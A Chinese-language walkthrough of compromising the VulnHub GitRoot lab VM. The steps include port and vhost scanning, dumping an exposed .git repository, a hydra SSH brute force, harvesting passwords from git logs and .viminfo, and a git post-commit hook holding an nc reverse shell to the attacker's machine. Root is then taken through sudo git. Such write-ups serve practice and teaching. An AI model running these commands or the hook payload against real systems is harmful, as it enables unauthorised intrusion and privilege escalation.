vulnhub之GitRoot的實踐

今天實踐的是vulnhub的GitRoot鏡像，

下載地址，https://download.vulnhub.com/gitroot/GitRoot.ova，

用virtualbox導入，直接從console上看到了地址，192.168.0.195，

繼續做端口掃描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.195，

有web服務，瀏覽器訪問http://192.168.0.195，

提示了域名，wp.gitroot.vuln，把gitroot.vuln加入/etc/hosts，

進行其它子域名的發現，獲取到子域名repo.gitroot.vuln，

gobuster vhost --append-domain -u gitroot.vuln -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200"，

把repo.gitroot.vuln加入/etc/hosts，

進行目錄掃描，dirb http://repo.gitroot.vuln，

發現http://repo.gitroot.vuln/.git/，

kali攻擊機上下載gitdumper，

git clone https://github.com/arthaud/git-dumper.git，

cd git-dumper，mkdir backup，

把信息dump到本地，

./git_dumper.py http://repo.gitroot.vuln/.git/ backup，

查看，cd backup，git log，獲取到用戶名pablo，

破解密碼，hydra -l pablo -P /usr/share/wordlists/rockyou.txt 192.168.0.195 ssh，獲取到密碼mastergitar，

ssh登錄，ssh pablo@192.168.0.195，不是root，發現三個賬戶，

進入目錄，cd /opt/auth/.git/logs/refs/heads，

找到了beth的密碼r3vpdmspqdb，

切到beth，su beth，

進入臨時可寫目錄，cd /tmp，

創建目錄，mkdir -p .git/hooks，cd .git/hooks，

創建文件，vim post-commit，

nc 192.168.0.197 4444 -e /bin/bash

給權限，chmod 777 post-commit，

回到tmp目錄，cd /tmp，壓縮文件，7z a shell.zip .git/，

kali攻擊機那邊用nc開個反彈shell監聽，nc -nlvp 4444，

cp shell.zip /home/jen/public/repos/，

kali攻擊機拿到反彈shell，

轉成交互式，python3 -c "import pty;pty.spawn('/bin/bash')"，

進入home目錄，cd /home/jen，查看ls -la，

從文件中獲取到密碼，cat .viminfo，binzpbeocnexoe，

sudo -l查看root權限程序，是git，

GTFOBins搜到提權方法，

提權，sudo git -p help config，!/bin/sh，id確認是root，